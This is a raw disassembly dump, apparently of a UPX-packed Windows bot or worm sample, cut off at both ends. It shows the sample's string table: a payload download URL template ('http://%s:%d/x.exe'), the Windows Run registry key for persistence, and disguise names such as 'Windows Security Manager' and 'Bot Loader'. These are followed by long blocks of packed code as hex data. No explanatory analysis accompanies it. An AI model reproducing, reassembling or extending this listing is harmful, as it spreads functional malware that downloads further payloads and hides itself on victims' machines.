; DATA XREF: sub_314223B2+2Ao align 10h aU10x db 'u10x',0 ; DATA XREF: sub_314223B2+23o align 4 aHttpSDX_exe db 'http://%s:%d/x.exe',0 ; DATA XREF: sub_31422712+2Do align 4 aSoftwareMicros db 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',0 ; DATA XREF: sub_314221C4+23o ; sub_314229E6+66o ... align 4 aCryptographicS db 'Cryptographic Service',0 ; DATA XREF: sub_314221C4+1Co ; sub_31422A9B+87o ... align 4 aYfhvczaxyr db 'yfhvczaxyr',0 ; DATA XREF: sub_314215C7+4Fo ; sub_31422B67+57o ... aRt db 'rt',0 align 4 dd 2 dup(0) aSoftwareMicr_0 db 'Software\Microsoft\Wireless',0 ; DATA XREF: sub_31422B67+32o aClient db 'Client',0 ; DATA XREF: sub_31422B67+BCo ; sub_31422B67+F8o align 10h aId db 'ID',0 ; DATA XREF: sub_31422B67+37o ; sub_31422B67+75o align 4 aWindowsUpdate db 'Windows Update',0 ; DATA XREF: sub_314229E6+55o align 4 aMsConfigV13 db 'MS Config v13',0 ; DATA XREF: sub_314229E6+4Eo align 4 aAvserve2_exeup db 'avserve2.exeUpdate Service',0 ; DATA XREF: sub_314229E6+47o align 10h aAvserve_exe db 'avserve.exe',0 ; DATA XREF: sub_314229E6+40o aWindowsUpdateS db 'Windows Update Service',0 ; DATA XREF: sub_314229E6+39o align 4 aWinupdate db 'WinUpdate',0 ; DATA XREF: sub_314229E6+32o align 10h aSystray db 'SysTray',0 ; DATA XREF: sub_314229E6+2Bo aBotLoader db 'Bot Loader',0 ; DATA XREF: sub_314229E6+24o align 4 aSystemRestoreS db 'System Restore Service',0 ; DATA XREF: sub_314229E6+1Do align 4 aDiskDefragment db 'Disk Defragmenter',0 ; DATA XREF: sub_314229E6+16o align 10h aWindowsSecurit db 'Windows Security Manager',0 ; DATA XREF: sub_314229E6+Fo align 4 a1: ; DATA XREF: sub_31422B67+B7o unicode 0, <1>,0 dd 6 dup(0) dword_31424FE8 dd 0 ; DATA XREF: sub_3142207E+C7r ; sub_314221C4+80w dword_31424FEC dd 0 ; DATA XREF: sub_314215C7+43r ; sub_314216A2+53o ... dword_31424FF0 dd 0 ; DATA XREF: sub_3142207E+79r ; sub_3142207E:loc_3142212Cr ... dword_31424FF4 dd 44h ; DATA XREF: sub_31421DF0+C2r ; UPX0:3142235Cw ... dword_31424FF8 dd 0 ; DATA XREF: sub_3142239E+2r ; sub_314223B2+CEw dword_31424FFC dd 0 ; DATA XREF: sub_314221C4+E0w ; sub_31422712+20r dword_31425000 dd 31420000h ; DATA XREF: sub_31421DF0+6r ; UPX0:31422341w dword_31425004 dd 0 ; DATA XREF: sub_314215C7+49r ; sub_314216A2+4Ao ... dword_31425008 dd 0 ; DATA XREF: UPX0:314227AFw ; UPX0:314227C1w word_3142500C dw 0 ; DATA XREF: sub_3142255F+3Br ; sub_314225C3:loc_31422624r ... align 10h dword_31425010 dd 0 ; DATA XREF: sub_31422B67+25w ; sub_31422B67+110w align 1000h UPX0 ends ; Section 2. (virtual address 00006000) ; Virtual size : 00002000 ( 8192.) ; Section size in file : 00002000 ( 8192.) ; Offset to raw data for section: 00006000 ; Flags E0000060: Text Data Executable Readable Writable ; Alignment : default ; =========================================================================== ; Segment type: Pure code ; Segment permissions: Read/Write/Execute UPX1 segment para public 'CODE' use32 assume cs:UPX1 ;org 31426000h assume es:nothing, ss:nothing, ds:UPX0, fs:nothing, gs:nothing dword_31426000 dd 0C4h, 40h, 72695601h, 6C617574h, 65657246h, 69560100h ; DATA XREF: UPX1:31427BB1o dd 61757472h, 6C6C416Ch, 100636Fh, 4D746547h, 6C75646Fh dd 6C694665h, 6D614E65h, 1004165h, 7274736Ch, 69706D63h dd 43010041h, 4679706Fh, 41656C69h, 69570100h, 6578456Eh dd 43010063h, 74616572h, 6F6F5465h, 6C65686Ch, 53323370h dd 7370616Eh, 746F68h, 6F725001h, 73736563h, 69463233h dd 747372h, 72655401h, 616E696Dh, 72506574h, 7365636Fh dd 50010073h, 65636F72h, 32337373h, 7478654Eh, 736C0100h dd 70637274h, 1004179h, 61657243h, 76456574h, 41746E65h dd 61570100h, 6F467469h, 6E695372h, 4F656C67h, 63656A62h dd 44010074h, 74656C65h, 6C694665h, 1004165h, 74697257h dd 6C694665h, 43010065h, 65736F6Ch, 646E6148h, 100656Ch dd 61657243h, 69466574h, 41656Ch, 74736C01h, 6E656C72h dd 6C010041h, 63727473h, 417461h, 74654701h, 74737953h dd 69446D65h, 74636572h, 4179726Fh, 65470100h, 636F4C74h dd 49656C61h, 416F666Eh, 6C530100h, 706565h, 746E4901h dd 6F6C7265h, 64656B63h, 68637845h, 65676E61h, 736C0100h dd 70637274h, 416E79h, 74654701h, 72727543h, 50746E65h dd 65636F72h, 1007373h, 50746547h, 41636F72h, 65726464h dd 1007373h, 64616F4Ch, 7262694Ch, 41797261h, 72570100h dd 50657469h, 65636F72h, 654D7373h, 79726F6Dh, 704F0100h dd 72506E65h, 7365636Fh, 47010073h, 6F4D7465h, 656C7564h dd 646E6148h, 41656Ch, 74654701h, 6B636954h, 6E756F43h dd 43010074h, 74616572h, 74754D65h, 417865h, 65724301h dd 54657461h, 61657268h, 43010064h, 74616572h, 6F725065h dd 73736563h, 53010041h, 76457465h, 746E65h, 65704F01h dd 6576456Eh, 41746Eh, 69784501h, 72685474h, 646165h, 746E4901h dd 6F6C7265h, 64656B63h, 72636E49h, 6E656D65h, 52010074h dd 46646165h, 656C69h, 74654701h, 656C6946h, 657A6953h dd 78450100h, 72507469h, 7365636Fh, 47010073h, 614C7465h dd 72457473h, 726F72h, 0D100h, 0 dd 65520100h, 65724367h, 4B657461h, 78457965h, 52010041h dd 65536765h, 6C615674h, 78456575h, 52010041h, 75516765h dd 56797265h, 65756C61h, 417845h, 67655201h, 6E65704Fh dd 4579654Bh, 1004178h, 44676552h, 74656C65h, 6C615665h dd 416575h, 67655201h, 736F6C43h, 79654B65h, 62410100h dd 5374726Fh, 65747379h, 7568536Dh, 776F6474h, 100416Eh dd 70797243h, 65724374h, 48657461h, 687361h, 79724301h dd 61487470h, 61446873h, 1006174h, 70797243h, 72655674h dd 53796669h, 616E6769h, 65727574h, 43010041h, 74707972h dd 74736544h, 48796F72h, 687361h, 79724301h, 65447470h dd 6F727473h, 79654B79h, 72430100h, 52747079h, 61656C65h dd 6F436573h, 7865746Eh, 43010074h, 74707972h, 75716341h dd 43657269h, 65746E6Fh, 417478h, 79724301h, 6D497470h dd 74726F70h, 79654Bh, 0DE00h, 0EC00h, 72730100h, 646E61h dd 6D656D01h, 797063h, 72747301h, 6E656Ch, 6D656D01h, 746573h dd 6E617201h, 5F010064h, 65637865h, 685F7470h, 6C646E61h dd 337265h, 72747301h, 727473h, 72747301h, 726863h, 0E900h dd 11000h, 69460100h, 6957646Eh, 776F646Eh, 47010041h dd 6F467465h, 72676572h, 646E756Fh, 646E6957h, 100776Fh dd 57746547h, 6F646E69h, 72685477h, 50646165h, 65636F72h dd 64497373h, 73770100h, 6E697270h, 416674h, 0F400h, 12400h dd 6E490100h, 6E726574h, 704F7465h, 72556E65h, 100416Ch dd 65746E49h, 74656E72h, 6E65704Fh, 49010041h, 7265746Eh dd 4374656Eh, 65736F6Ch, 646E6148h, 100656Ch, 65746E49h dd 74656E72h, 43746547h, 656E6E6Fh, 64657463h, 74617453h dd 49010065h, 7265746Eh, 5274656Eh, 46646165h, 656C69h dd 10000h, 13C00h, 73FF00h, 0FF0002FFh, 1FF000Dh, 39FF00h dd 0FF006FFFh, 17FF0034h, 0CFF00h, 0FF0009FFh, 13FF0004h dd 10FF00h, 0FF0016FFh, 3, 50000000h, 4C000045h, 0DC000201h dd 40DD34h, 0 dd 0E0000000h, 0B010F00h, 601h, 26h, 12h, 34000000h, 23h dd 10h, 40h, 314200h, 10h, 4000002h, 0 dd 4000000h, 2 dup(0) dd 60h, 4, 2000000h, 0 dd 1000h, 10h, 1000h, 10h, 10000000h, 2 dup(0) dd 34000000h, 8C00002Dh, 15h dup(0) dd 7C000010h, 1, 5 dup(0) dd 2E000000h, 74786574h, 56000000h, 24h, 10h, 26h, 4, 2 dup(0) dd 20000000h, 2EE00400h, 61746164h, 14000000h, 10h, 40h dd 10h, 2Ah, 2 dup(0) dd 40000000h, 0C00000h, 3C000050h, 0C300002Fh, 0A1000054h dd 89254BBEh, 0DB43AA85h, 0AEF070A0h, 92A2047Dh, 4EC00F3Ch dd 27BE81Ch, 8402F26Ah, 47FC7D1Bh, 0F0024A19h, 0A033E402h dd 2164868h, 0D2B735D7h, 0A73D7D03h, 769F6801h, 36E6CCE6h dd 3A4A2064h, 1B5AB7CCh, 0DC87B734h, 6A7684E0h, 96F42A70h dd 0E6C8E38Ch, 5EC86080h, 7A97640Ah, 273E1B25h, 0A2280084h dd 364B003Fh, 3CD9B96Bh, 98B9B26Ch, 0E477BDE2h, 0DC016754h dd 317E500Fh, 0C777C3E4h, 0AC683B0Dh, 0D328C00Dh, 0B138CEDCh dd 0E56F08C9h, 0DB0C7A04h, 0D2484522h, 0DD2DC5F8h, 0D61B212Fh dd 402EDB1Ch, 67012DEh, 4C9039ECh, 40BCF844h, 0C27190D6h dd 1BDE5044h, 593B1E10h, 94B7336Fh, 8121970Dh, 67E9ACF9h dd 0E87CFEEBh, 1624A580h, 68250600h, 259D1C52h, 1CF25B07h dd 96F41276h, 899DE9C3h, 940AEF65h, 7BC87C6Ah, 64B1E3C3h dd 0C9BE490Ch, 991DD97Bh, 90E154E4h, 8C9FE924h, 0DCCCC349h dd 0CF78242Eh, 2C8248EDh, 0F864052Ch, 66F4150Ch, 3319A002h dd 8707A23h, 8F895E74h, 0F4C6DD0Eh, 1C51CC5Fh, 80B3EF9Ch dd 7F24E4A1h, 5A435A8h, 0B5D0781Bh, 571282F8h, 5A745737h dd 0ACBF931h, 74F80E14h, 9A0684Bh, 0CA28B753h, 2D3D74CEh dd 67ED85C9h, 0A0412069h, 0FFC55FFh, 35BAB9E8h, 50E49ED7h dd 0E9628ACh, 5B3002F0h, 5547BF4Dh, 8C0009F8h, 681583E4h dd 0F475583Bh, 1887EE42h, 851321C5h, 0A90A508Bh, 0BFF77FB6h dd 3C418B2Fh, 68C10357h, 488B4D30h, 50788B34h, 0A0F44D89h dd 8D7031B4h, 1BDBD84Bh, 0CD5285D8h, 1F0F552h, 0EC7047D2h dd 0EC1265F1h, 0D790ED74h, 9ABD1110h, 0E82636Ch, 5D231409h dd 0F11BE164h, 5051F84Dh, 68971818h, 8B1B1528h, 5DB0892Ah dd 58D1B040h, 6B03CA3Ah, 5E30EB34h, 193B5BB5h, 0F05559ABh dd 52EA037Dh, 45E626B7h, 3151F03Eh, 3DC25350h, 0AC1ED9F1h dd 0D6BDF435h, 3C4FFAFAh, 0D06A1778h, 3BEC5577h, 5F0574C7h dd 589B56B9h, 8CBF1BEBh, 0B9CD2534h, 0E5985CDh, 7EB05FCh dd 0A1EF7408h, 5817D487h, 51515FFCh, 6468512Fh, 310F60B8h dd 0D00D5C69h, 252C8836h, 0B1AFDDB8h, 0AEBAC44Ch, 0FECB213h dd 71C22D59h, 0F9EBA67Bh, 3CBCB66Ah, 35500C80h, 0A82C49DDh dd 2C507D50h, 91165DC0h, 2019852Eh, 0A971437Ch, 8B577F16h dd 0D214247Ch, 0FD177E11h, 8760CFFFh, 61C2801Ah, 461E1488h dd 0E97CF73Bh, 3B2480h, 593575B6h, 448B548Ch, 65A5F2Eh dd 0ACF19D0Ch, 66DB5657h, 0BB622F21h, 0DC73074Bh, 501950F0h dd 4D000056h, 0ACAA25B8h, 0DBC49577h, 4DF0E3DAh, 0FA6849F4h dd 65FFF00Ch, 0C7A326DAh, 0CC343408h, 7B666B2Ah, 754C2EB2h dd 0BC500A0Ah, 0E84F8520h, 54181A5Ch, 7FB807C6h, 5F6B7C3Bh dd 40740180h, 1008B0Ch, 448D5108h, 0B166D824h, 30215F73h dd 5903D311h, 4D3E13BAh, 0CC150724h, 0C82007BBh, 1D0CF1FEh dd 0C8E4332Fh, 10E7C1F8h, 0D9919E6Ch, 0B60B85h, 915D8B02h dd 12351C09h, 4001F333h, 0C2C03AB2h, 0CFC653C4h, 0E3676D5Eh dd 5035F211h, 0B4B06825h, 831C0135h, 33ADE748h, 0B5ECF203h dd 9541F017h, 7568CC35h, 3D986866h, 6C58B7A3h, 0F0446EC6h dd 58FE474Fh, 0B31A54Dh, 0DA141B37h, 0EEBF0354h, 34007C74h dd 0B933A1h, 0BAEDDB79h, 3BC72B7Fh, 8B0272C1h, 292BE1C1h dd 318E8A1h, 0BF8923C7h, 0CCACDCA5h, 1172233Dh, 0A36786Ah dd 40F868CFh, 0E113C4EBh, 5B3D9350h, 0D411778Ch, 5815941Eh dd 68C9BB93h, 68030B40h, 6759973Ch, 3A3CB36Dh, 52535453h dd 8FA311F8h, 9824D083h, 4DB04C2h, 30232C66h, 0B1F70E64h dd 60B0C0B5h, 4EE808D0h, 3A95D0DDh, 6806C8EEh, 1D898068h dd 0EEDB6897h, 7E182784h, 0D4C014ECh, 0DB3000F2h, 539153DAh dd 3A01027Bh, 4D26B51Ah, 0FD7780EBh, 39ACD28Dh, 2F741A4Dh dd 1D59DECDh, 0CA3DC9Eh, 0B6FEA365h, 0A49784C6h, 565153FCh dd 37D83A86h, 6874B623h, 5EF92656h, 0FBE369Ah, 10C25819h dd 56C05E05h, 8499A5E9h, 89E80C4Bh, 0D80DEC5Dh, 53BFB7Dh dd 1FFF25FFh, 0A3C33A04h, 0E77443FCh, 37FA126Fh, 84CC8A1Fh dd 50DF74C9h, 6E42EA6Bh, 5F57C661h, 6465A540h, 0AFA6B0Ch dd 5F7B4499h, 1FD814F8h, 0E8FEB3ABh, 7E689E48h, 624E1520h dd 7B385097h, 0CF53E2EBh, 9043455Fh, 3059875Eh, 3CAE7001h dd 36D0F433h, 11D6B0EBh, 0D6E6023Eh, 0C1E6C342h, 68B4803Ah dd 63A3ABB4h, 0BE608AC0h, 7B7C74E0h, 76336182h, 0E4FBF4A3h dd 4552B73Dh, 767BB37Dh, 640D29E0h, 1BE21904h, 23B26863h dd 9C170D13h, 0EB13EC13h, 7EC6AC86h, 99AE13EDh, 44F83569h dd 0E4093970h, 8F401824h, 4DC3390h, 8C64D24Bh, 0EF609045h dd 391C8E06h, 98589472h, 0A0489C50h, 2391C840h, 0A838A447h dd 1C28AC30h, 0B0E47239h, 0B81CB420h, 9114BC18h, 0C08E4723h dd 0C80CC410h, 0F3E47208h, 0D000CCC8h, 0F8D44DFCh, 8E6DF4D8h dd 0F0DC391Ch, 0E8E4ECE0h, 6CD7E068h, 3704C011h, 0DEA36CD3h dd 0ADB72F1Bh, 8C02FCB0h, 12730983h, 6EDD8C34h, 85414B80h dd 594A8D90h, 0E8EB0CFFh, 9C8709B1h, 5CB40D1Ah, 7E0F991Ah dd 748739A1h, 4DD86839h, 989DA8ABh, 4D373D8Ch, 0F6DC806h dd 0DD26121h, 4659AC0h, 5BB3B724h, 1521C46Bh, 16A20A34h dd 0E41173E3h, 2842276Eh, 0D21E5F9Ah, 0B414AE87h, 1388F818h dd 24E3EB9Ch, 99093C28h, 95AF5A15h, 247031B6h, 0A4806355h dd 1F0AAD7Fh, 8A51AD01h, 6A9E0B45h, 0EC380C1Eh, 52DB32FFh dd 3831CC3Ah, 108FE35Dh, 8825DCDFh, 7D20B5Dh, 35B70FFDh dd 80CF5A0Ch, 0F59A93Fh, 3FEF799h, 0C3FE8ED6h, 0FC65B2EDh dd 72FFFB80h, 62BA5EBDh, 3B265F76h, 6F045981h, 0A0586833h dd 4F43856Dh, 40A8108h, 9DB59B0Ch, 8F0B090Dh, 9B49275h dd 0F758076h, 2C255FF9h, 0D9DADE41h, 84323D89h, 0E7D703FFh dd 43EB50DBh, 9623FB81h, 5D875F9Fh, 13B166BAh, 5A737B4Fh dd 73C196A2h, 2FE665h, 0DBE78B79h, 0FF04FD73h, 7F3CF6FEh dd 0C6C5B688h, 0F50F339Fh, 0F33B088Bh, 3B27AADCh, 0A33E1D8Bh dd 2F9E57A0h, 2259ED57h, 0F8D69C60h, 56E21359h, 0FFC390E2h dd 0EE75B3BBh, 5E1AC8ECh, 271068F2h, 0D3BED3A6h, 1C18099Eh dd 2D70843Ch, 2AD650A9h, 454E6105h, 32F8FC2h, 5C6A2BA6h dd 9DCDF2AAh, 3A4C5E0Fh, 6E030BFCh, 0B0AB60C0h, 103B4E35h dd 0BC025E11h, 42BA275Bh, 80C6096Ch, 0FAE17616h, 6F39DF0Bh dd 57935655h, 57B1019h, 13E6D884h, 8F0D0CC3h, 1F0CA551h dd 0B120DDFDh, 1462F489h, 0BF66153h, 340B7F02h, 38506ADBh dd 52C5D08h, 740096D2h, 0B5E8F1AEh, 1110918h, 3BB00510h dd 141960E1h, 6D84F00h, 103B0E17h, 0BDAAA27Eh, 0D5530D74h dd 203C51C7h, 11106844h, 18244C39h, 37D0DB0Eh, 0ED85ED3Ah dd 4BA5117Eh, 834D2C26h, 14DB0EEDh, 0A20596EFh, 750DF2EBh dd 24B7160Eh, 0FADDEB65h, 2C193F68h, 1B33D170h, 46CE0C96h dd 0A915182Ch, 0E974106Eh, 1408FA10h, 18D9512Fh, 165B1B56h dd 1837FC72h, 3D563EF6h, 0B8C6239h, 412ADC74h, 0C0B6E965h dd 2050D361h, 6C5F1810h, 3089381h, 550F5EAAh, 344AEB8Bh dd 33E1C68Bh, 32C562Eh, 5359D932h, 27005556h, 108B59CBh dd 0C520A25h, 724C5904h, 0AF5D0C20h, 0E418713Ch, 0DE530128h dd 7EDE4E21h, 8E6956E2h dd 1E3C3494h, 794E365Ch, 0D8875F7h, 1D140487h, 0B2582D28h dd 7AA4BBC5h, 0D85A3568h, 3D9A045Eh, 203B10F4h, 813DDF06h dd 7D221DCFh, 1E748D47h, 983F7B01h, 56FCCF40h, 0FF1C1E48h dd 0DEA5E417h, 4545E0B5h, 521F0FFFh, 36666C38h, 46506008h dd 0E6740E1Ch, 89BD766Ah, 36A93CB7h, 0D68681B2h, 4FB0B657h dd 8E47069Ch, 84D4391Ch, 70DC78D8h, 0C8E464E0h, 4CE42391h dd 24EC40E8h, 72398326h, 4F414F0h, 9C4C84B7h, 0BF0B9A2Fh dd 8AF9BE64h, 7E2C742Ch, 0C43D188Bh, 34597B06h, 177572B4h dd 0D354490Eh, 91DC113h, 48833E2Ah, 0A3C9A891h, 88E075BDh dd 0C1361188h, 9746A78h, 317674B4h, 8859FE8Bh, 0BCDE636Ah dd 0F82FA184h, 83227027h, 0C08303E0h, 51705705h, 59CD45E9h dd 230DCAFDh, 1210CFD7h, 0BDCCC33Dh, 26D60713h, 9D3F140Eh dd 0E887B305h, 40A26150h, 0E84D096Fh, 0C63F4120h, 99598B36h dd 41D986D7h, 60D9F424h, 1F4541Bh, 61E812B8h, 8BE007BAh dd 22E7D89Fh, 1FC517D0h, 0A600C748h, 5914310Dh, 21BA1025h dd 0B3BFBF08h, 501D6AE0h, 71DCBFh, 0A03F514Fh, 7403D583h dd 0BB0A3137h, 615FD8A0h, 52D1BEA7h, 8B37F453h, 0BC3D660Dh dd 0B1383D53h, 0EE6BDB3Ah, 0CE590FEBh, 368B632h, 1B0C165Bh dd 16C965E2h, 0C2268DDCh, 3141CC68h, 683A464Eh, 0B9BB66E7h dd 12971A0Dh, 66AF495Eh, 4A4C12C1h, 0DE1219EEh, 0BBC631D8h dd 162CFD3Bh, 0B596C823h, 0A3480710h, 0CF216C5h, 0CD6015EBh dd 1CA65709h, 5D511910h, 43D5F07Dh, 5044330Ch, 856A7D68h dd 138B67BEh, 0CC4011h, 0F23306FFh, 5284CDCh, 0F0F410F8h dd 3DF52351h, 9B51001Bh, 0FBF63F8Dh, 14723BBEh, 2D0BE981h dd 17018504h, 0C82BEC73h, 0D5A0568Bh, 8B0CC4B7h, 0EA088BE1h dd 0C6C653A3h, 6443B646h, 4958055Ch, 0A8A04500h, 51E600C0h dd 6F18054h, 0E296EF02h, 53522497h, 8F803141h, 8DF50101h dd 0FFFF1183h, 5279FFFFh, 3AE42AECh, 9B49E7F6h, 0AFBEE0EAh dd 447EDB21h, 615E1A95h, 1F85A032h, 0FF949F6Ah, 43FF3994h dd 0A684FFFFh, 0CE358F26h, 0C9A55C1Dh, 657AB20Bh, 4D373072h dd 6C697A6Fh, 0FF6B616Ch, 342FFFFFh, 2820302Eh, 706D6F63h dd 62697461h, 203B656Ch, 4549534Dh, 9153620h, 7FFFBA81h dd 646E6957h, 2073776Fh, 3520544Eh, 3429312Eh, 0BE798EE4h dd 0D4007767h, 0B4C40104h, 0E790A00Eh, 80E7BEFBh, 0E680474h dd 9B480958h, 3C9E79ECh, 4530D474h, 0E7C82220h, 4A1026F9h dd 40F80030h, 6FFDB6B7h, 76766313h, 7E75722Eh, 65070077h dd 0C6DFEF64h, 65976CB6h, 65C1660Fh, 72616573h, 370E6863h dd 1F6FFE57h, 6F626F72h, 61686378h, 1FD2676Eh, 7C8D7465h dd 720C6FFBh, 69622E64h, 2861007Ah, 616B6863h, 0BB17376Dh dd 6740CB0h, 24782Dh, 0B76F6C06h, 0E6DB66Dh, 476B3762h dd 7A027626h, 0DFB1852Eh, 1B7674DEh, 706F7411h, 69176E2Eh dd 10ADB00Fh, 332773B0h, 6F0F788Dh, 611FE176h, 746C7564h dd 694B652Dh, 0E1338072h, 6FDB6EDBh, 4E73A66Eh, 67622E74h dd 6B67694Fh, 32580FBFh, 61777800h, 62626A2Ch, 0F676DFADh dd 7A9B006Fh, 0A8616661h, 23655D2Eh, 10FFFE5Ch, 6261AF09h dd 66656463h, 6A696867h, 6E6D6C6Bh, 0DDBF0A1Bh, 0F77271C5h dd 78777675h, 43650E79h, 0F8DFED44h, 474645FFh, 4B4A4948h dd 4F4E4D4Ch, 54545150h, 58575655h, 71B5A59h, 23187FF6h dd 70747468h, 252F2F3Ah, 0DF2F0B73h, 65737E16h, 68702E97h dd 3D0E3F70h, 6373260Fh, 0CF6FED6Eh, 2664066Fh, 76666E69h dd 39313D3Bh, 1526322Dh, 0B948EC1Eh, 0EBA21D74h, 32313D58h dd 7F7D9137h, 3101A8D7h, 3030383Ah, 0DFDF652Fh, 1FFFFB00h dd 5DDFE8B0h, 0B966C933h, 758D01EEh, 8AFE8B05h, 7993C06h dd 6DFFFD06h, 302C0646h, 88993446h, 0EDE24707h, 0DAE80AEBh dd 0FEFFDB7Eh, 6765DF85h, 9993712Eh, 0FD1201C9h, 16FD91BDh dd 0FEEBC107h, 6872FFFDh, 66FD42AAh, 0BA10FDAAh, 98A91C14h dd 98F3C91Ah, 28608F1h, 763FF67Fh, 9010C071h, 9237CB5Fh dd 781C9659h, 57E4143Ah, 7DB77D71h, 3A0A61F2h, 9DF34571h dd 98904F1h, 0DF73A47Fh, 119C04F1h, 0F367B340h, 1C10F0E3h dd 0B1DDBDFEh, 59B20BDCh, 25C99B60h, 414D901h, 0B1F2C8A1h dd 71CA17C7h, 688D2B9Eh, 0ADAD9161h, 1AC2F67Dh, 111D96E2h dd 0C850B228h, 0FDBB9900h, 0DC14EDB3h, 12255557h, 91C0A44Eh dd 0ED994912h, 9FBB54F7h, 1400DBFDh, 0CBCA3AC4h, 0FF1C3B71h dd 1A21E424h, 6D93CDCFh, 8FCDB0F6h, 3F812C66h, 76CDF31Eh dd 0B8B0FBFFh, 12CDC383h, 0CBC9A85Dh, 99AD251Dh, 24B64FECh dd 0A6485A0Bh, 1B14C096h, 3FD9767Eh, 0EBA7294Ch, 0E9BA9CF3h dd 26F43416h, 3FFEEE71h, 0EFCF5FBh, 0EF133BF9h, 376B4629h dd 4766DE5Fh, 0ECA0A8ECh, 16CDFFFDh, 0FFC5B701h, 0E9ECE9EDh dd 0E1FCB7FDh, 7FB7012Ch, 0F5CA21F7h, 0F25AFCFCh, 0FCF7EBFCh dd 0D6ABAAF5h, 0BFEC34C7h, 0AAF9FFFCh, 2A25B459h, 0ACC9662Ah dd 0B7819093h, 83639D90h, 9271CDC9h, 17DD8430h, 3519BFFEh dd 95D91451h, 2A91720Ah, 68EBC871h, 0D21FFFFFh, 80D512A5h dd 0AA529AE1h, 2A8D146Fh, 12B9C89Ah, 474A9A8Bh, 0DFDBFFFFh dd 9BAB9EC3h, 20A319DBh, 0DDA26CECh, 9EED85BDh, 81E8A2DFh dd 125544EBh, 0FFF9A1C8h, 961FBDB7h, 12EB8D2Eh, 5A9A85D8h dd 9A099D12h, 96F8105Ah, 613FF76Dh, 664922D0h, 12FEFD7Fh dd 0C25AA987h, 680C0295h, 1285EDDBh, 5A910482h, 7FCFF7CBh dd 0FF372139h, 4D53FF85h, 53187242h, 0FCFEFFC8h, 62FE97FFh dd 43500200h, 57544583h, 204B524Fh, 474F5250h, 204D4152h dd 7DAC5231h, 4C17CD6Bh, 24D4E41h, 56EBAB0Ah, 15661D6Ah dd 676B03B7h, 0D2DD6EBBh, 0E707576h, 27611A33h, 5832234Dh dd 96C3E54Ch, 32323221h, 79D6312Eh, 18DA6B06h, 8B323C20h dd 50BB73A4h, 2207192Bh, 5123FF0Ch, 7D8363h, 140A1104h dd 0FD40520h, 0A0BB5BD1h, 4B4C0069h, 0B7505353h, 923DBF97h dd 0E00882E0h, 2400574Ah, 64006Eh, 0EE6D8B6Fh, 73007502h dd 130743Ah, 0D912DB09h, 398CDBh, 2E1D2335h, 0D913907h dd 0ABDA0098h, 49922008h, 57DAE406h, 6760D89Fh, 0F2000370h dd 7472346h, 3203C8DCh, 6000640h, 237F0110h, 151FFFFAh dd 48E0888Ah, 44004F00h, 7A6A19FEh, 6F49E4F2h, 1CFFB022h dd 2530AF28h, 53671074h, 0D7DF5CE1h, 7590A796h, 5C040030h dd 0BAEEBD07h, 85A35D7h, 2E4D615Ch, 38003607h, 46C6EDB1h dd 1B30772Eh, 43EC0049h, 336761CFh, 633F00E8h, 2DBFA264h dd 0DC08201Fh, 0FF164004h, 0DEDE00h, 0E41EC242h, 9F16000Eh dd 40260201h, 6137EFB8h, 11031928h, 97D96C8Bh, 7468D835h dd 2A9B70D3h, 852DB69Ch, 9F256B7Ch, 0EB480E10h, 47B03BAh dd 5413541Bh, 3F63265Ah, 59ADB9F7h, 0CBC75C22h, 5876545h dd 907BD800h, 10030BE6h, 0B810B848h, 0FD8F0B0Eh, 6A05BFFFh dd 0C391928h, 9B11D0B1h, 4FC000A8h, 5FF52ED9h, 0F68A885Dh dd 0EBFC2FB2h, 9F11C91Ch, 102B3CE8h, 0CD16048h, 92BCA3F4h dd 0A06045CFh, 470CA00Ch, 0B1879006h, 0CA0000Ch, 277FDF24h dd 9004088h, 703EC00h, 8F60D900h, 401495F0h, 40707C4Fh dd 1F0700BFh, 4314BD91h, 13857813h, 0F84F3C81h, 0A65BAB00h dd 0F81013E9h, 0E31A8B2Fh dd 0EFEFF39h, 4FBE4023h, 806183Ah, 0B9438884h, 7C9E4F10h dd 1FFEEBAh, 200C10B8h, 3E420DADh, 7F0726CCh, 0E4AFD80Fh dd 118BCB3h, 840F8470h, 0F200DF0Fh, 0F9521h, 0F0847F02h dd 0F93C9B0h, 9A000F6Ch, 5BD911A8h, 13436F95h, 8127F958h dd 586E691Fh, 72502050h, 0DB679000h, 1444614h, 906B3239h dd 3C89F927h, 2751512h, 43005341h, 1C81AF64h, 7FEB0194h dd 695FFF3h, 255C5CC6h, 70695C73h, 81662463h, 0FF071CECh dd 2EA6A3E4h, 655300FFh, 75626544h, 85766967h, 0FD93A767h dd 64411F46h, 5461756Ah, 6E656B6Fh, 93FB7317h, 6F4C36DCh dd 56707512h, 65756C61h, 0B1A91741h, 704FB7EDh, 24636F28h dd 43003473h, 1D4B062Ah, 333F6176h, 6CE0AFE3h, 6D4C7954h dd 7F12BAF9h, 5F1565A3h, 79617254h, 430F3957h, 0A5B6A5B7h dd 521E6135h, 54056F6Ch, 0AA546B68h, 56140C73h, 6D5CDF77h dd 416D6EA6h, 78455328h, 8D6E3E7Bh, 35ACF4BEh, 22F3F54Bh dd 50545448h, 0E25FBD83h, 32204012h, 4B4F205Bh, 6D010A0Dh dd 4BEA56B7h, 2D0244A3h, 4B67044Ch, 315BECD9h, 7525203Ah dd 56282F18h, 540F6B5Bh, 0A726B979h, 0AB518A70h, 8763D4CDh dd 0D6062F15h, 0CBD53DCAh, 0CD72972Dh, 546B57A3h, 4473168h dd 0FFFAF82Fh, 6468F74Ah, 8D73CFE9h, 6376736Dh, 68596A71h dd 6977CFA9h, 0FBEC5DF5h, 5F32076Eh, 78EB7517h, 36380307h dd 3734D34Dh, 33343536h, 3A69A569h, 307CBF7h, 20303132h dd 39BB3B9Fh, 3D003833h, 0C833707h, 3536C832h, 320E3334h dd 313220C8h, 0A56B7830h, 3AF7A426h, 0D8BBD9D0h, 533FFE5Eh dd 5754464Fh, 5C455241h, 736F694Dh, 0D85CD76Fh, 0C3B07E1Ah dd 7275435Ch, 0DC561572h, 885C573h, 525C0A6Fh, 239F6E75h dd 0DA146F74h, 24D6A16Dh, 53203068h, 0ED87FB1Bh, 3FE728FFh dd 64736E67h, 2B796A72h, 1980265h, 530064DCh, 155F0A51h dd 0E4B619Ah, 664B4D6Ch, 0CD899087h, 0C549235Fh, 2F05538h dd 0FF540A18h, 43205317h, 0DDA3EE5h, 76206762h, 58763FD5h dd 6DECD96Ch, 23B53284h, 165B1B7Ch, 471A17B2h, 1F8D1723h dd 931299BFh, 707379h, 0D62D6342h, 0C3208D1Ah, 1B132361h dd 0ED6D80C0h, 9752206Dh, 443772DDh, 2D2DBB9Eh, 661220E4h dd 0AC6D672Fh, 6C2FF62Ah, 632463C9h, 79746922h, 6E614D20h dd 16C8051Eh, 31BC1AB9h, 146B0A8Ah, 0A24E2370h, 